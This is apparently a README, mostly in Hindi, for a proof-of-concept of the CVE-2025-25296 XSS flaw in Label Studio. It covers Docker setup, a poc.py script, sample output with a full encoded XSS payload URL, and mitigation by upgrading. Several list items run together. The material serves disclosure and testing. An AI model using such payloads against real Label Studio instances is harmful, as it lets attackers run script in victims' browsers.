
Proof of Concept (POC) for the CVE-2025-25296 vulnerability affecting Label Studio versions prior to 1.16.0
यह प्रोजेक्ट Label Studio, एक ओपन-सोर्स डेटा लेबलिंग टूल, को प्रभावित करने वाली CVE-2025-25296 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) प्रदर्शित करता है। यह भेद्यता /projects/upload-example एंडपॉइंट में मौजूद है, जो GET अनुरोधों में उपयोगकर्ता-प्रदत्त HTML सामग्री को सैनिटाइज़ करने में विफल रहता है। यह हमलावरों को पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देता है, जिससे संभावित क्रॉस-साइट स्क्रिप्टिंग (XSS) हमले हो सकते हैं।
/projects/upload-example एंडपॉइंट1.16.0 या उसके बाद के संस्करण में अपडेट करेंअस्थायी वर्कअराउंड के रूप में:
/projects/upload-example एंडपॉइंट का उपयोग करने से बचें।setup.sh का उपयोग करके pip के माध्यम से इंस्टॉल किए गए)poc.py: भेद्यता का शोषण करने और XSS हमले को प्रदर्शित करने के लिए Python स्क्रिप्ट।setup.sh: Docker का उपयोग करके कमजोर वातावरण सेट अप करने की स्क्रिप्ट।इस रिपॉजिटरी को क्लोन करें:
git clone CVE-2025-25296-POC
cd CVE-2025-25296-POC
सेटअप स्क्रिप्ट चलाएँ:
chmod +x setup.sh
./setup.sh
सेटअप स्क्रिप्ट निम्न कार्य करेगी:
1.15.0) को पुल करना।localhost:8080 पर कमजोर Label Studio इंस्टेंस चलाना।एक्सप्लॉइट स्क्रिप्ट चलाएँ:
python poc.py
स्क्रिप्ट निम्न कार्य करेगी:
/projects/upload-example एंडपॉइंट पर एक क्राफ्टेड GET अनुरोध भेजना।XSS अलर्ट को देखने के लिए प्रदान किए गए URL को वेब ब्राउज़र में खोलें।
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E
इस भेद्यता को कम करने के लिए:
1.16.0 या उसके बाद के संस्करण में अपडेट करें।यह प्रोजेक्ट केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन्हीं सिस्टम पर करें जिन पर आपके पास स्पष्ट अनुमति हो। इस टूल का अनधिकृत उपयोग लागू कानूनों का उल्लंघन कर सकता है।